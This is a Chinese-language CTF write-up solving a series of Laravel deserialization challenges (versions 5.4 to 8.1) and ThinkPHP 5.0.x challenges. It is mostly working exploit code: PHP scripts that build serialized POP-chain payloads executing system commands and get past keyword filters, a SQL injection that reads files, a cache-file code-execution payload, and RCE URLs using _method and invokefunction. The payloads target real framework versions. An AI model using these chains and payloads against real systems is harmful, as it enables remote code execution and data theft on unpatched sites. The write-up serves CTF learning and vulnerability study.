web466
Laravel5.4反序列化
Laravel相关知识:
添加路由在/routes/web.php
添加控制器在/app/Http/Controlers/
题目在路由处添加了反序列化入口
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
Route::get('admin/{obj}',function($s){
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
利用已知的反序列化链
<?php
namespace Mockery\Generator {
class MockConfiguration {
protected $name = 'fallingskies';
}
class MockDefinition {
protected $config;
protected $code;
public function __construct() {
$this->config = new MockConfiguration();
$this->code = "<?php system('cat /flag');?>";
}
}
}
namespace Mockery\Loader {
class EvalLoader {}
}
namespace Illuminate\Bus {
use Mockery\Loader\EvalLoader;
class Dispatcher {
protected $queueResolver;
public function __construct() {
$this->queueResolver = [new EvalLoader(), 'load'];
}
}
}
namespace Illuminate\Broadcasting {
use Illuminate\Bus\Dispatcher;
use Mockery\Generator\MockDefinition;
class BroadcastEvent {
public $connection;
public function __construct() {
$this->connection = new MockDefinition();
}
}
class PendingBroadcast {
protected $events;
protected $event;
public function __construct() {
$this->events = new Dispatcher();
$this->event = new BroadcastEvent();
}
}
echo base64_encode(serialize(new PendingBroadcast()));
}
?>
如果生产payload罕有/
,需要进行url编码,这里需要进行两次编码%252f
web467
Laravel5.5反序列化
上题链被拦截,过滤了一堆关键字。
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
Route::get('admin/{obj}',function($s){
if(preg_match('/defaultChannel|Validation|Bus|messages|CallQueuedClosure/i', base64_decode($s))){
die('other way');
}
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
换一条链就行了
<?php
namespace Illuminate\Broadcasting
{
use Illuminate\Events\Dispatcher;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events = new Dispatcher($cmd);
$this->event=$cmd;
}
}
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
namespace Illuminate\Events
{
class Dispatcher
{
protected $listeners;
public function __construct($event){
$this->listeners=[$event=>['system']];
}
}
}
web468
更改了过滤内容
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
Route::get('admin/{obj}',function($s){
if(preg_match('/listeners|Validation|Bus|messages|CallQueuedClosure/i', base64_decode($s))){
die('other way');
}
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
使用其他链
<?php
namespace Illuminate\Notifications {
class ChannelManager {
protected $app;
protected $customCreators;
protected $defaultChannel;
public function __construct() {
$this->app = 'cat /flag';
$this->defaultChannel = 'fallingskies';
$this->customCreators = ['fallingskies' => 'system'];
}
}
}
namespace Illuminate\Broadcasting {
use Illuminate\Notifications\ChannelManager;
class PendingBroadcast {
protected $events;
public function __construct()
{
$this->events = new ChannelManager();
}
}
echo base64_encode(serialize(new PendingBroadcast()));
}
?>
web469
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
Route::get('admin/{obj}',function($s){
if(preg_match('/defaultChannel|listeners|Bus|messages|CallQueuedClosure/i', base64_decode($s))){
die('other way');
}
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
<?php
namespace Illuminate\Broadcasting
{
use Faker\ValidGenerator;
class PendingBroadcast
{
protected $events;
public function __construct($cmd)
{
$this->events = new ValidGenerator($cmd);
}
}
$seri = new PendingBroadcast('cat /flag');
echo base64_encode(serialize($seri));
}
namespace Faker
{
use Faker\DefaultGenerator;
class ValidGenerator
{
protected $maxRetries;
protected $validator;
protected $generator;
public function __construct($cmd)
{
$this->generator = new DefaultGenerator($cmd);
$this->maxRetries = 10000000;
$this->validator = 'system';
}
}
}
namespace Faker
{
class DefaultGenerator
{
protected $default;
public function __construct($cmd)
{
$this->default = $cmd;
}
}
}
?>
web470
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
Route::get('admin/{obj}',function($s){
if(preg_match('/defaultChannel|Validation|listeners|CallQueuedClosure/i', base64_decode($s))){
die('other way');
}
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
使用上题链
web471
laravel5.8 反序列化
使用上题链依然可以。
web472
laravel 8.1 反序列化
使用上题链依然可以。
web473
参考文章Thinkphp 5.0.15 设计缺陷导致Insert/update-SQL注入 分析
详细分析文章thinkphp5.0 SQL注入详细分析
thinkphp5.0.15默认控制器的部分代码,使用默认路由:
<?php
public function inject(){
$a=request()->get('a/a');
db('users')->insert(['username'=>$a]);
return 'done';
}
payload
/?s=index/index/inject&a[0]=inc&a[1]=exp(~(select%20load_file(%27/flag%27)))&a[2]=
这里使用updatexml不行,所以用的exp报错注入。
web474
thinkphp5.0.5默认控制器的部分代码,使用默认路由:
<?php
public function rce(){
Cache::set("cache",input('get.cache'));
return 'done';
}
参考文章Thinkphp cache缓存函数远程代码执行漏洞
缓存生成的路径和文件名是根据参数名的md5值计算的,这里是cache
。
?s=index/index/rce&cache=%0d%0asystem(%27cat%20/flag%27);//
缓存路径: runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php

参考修复内容,原本使用了//
来防止缓存文件解析,但可以使用换行符来绕过,修复时使用exit头来禁止解析缓存内容。
web475
参考文章thinkphp5 method任意调用方法导致rce
使用POST形式传参
_method=__construct&method=GET&filter[]=system&get[]=cat /flag
web476
参考之前的文章Thinkphp5未开启强制路由RCE
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
参考文章
https://www.anquanke.com/post/id/258264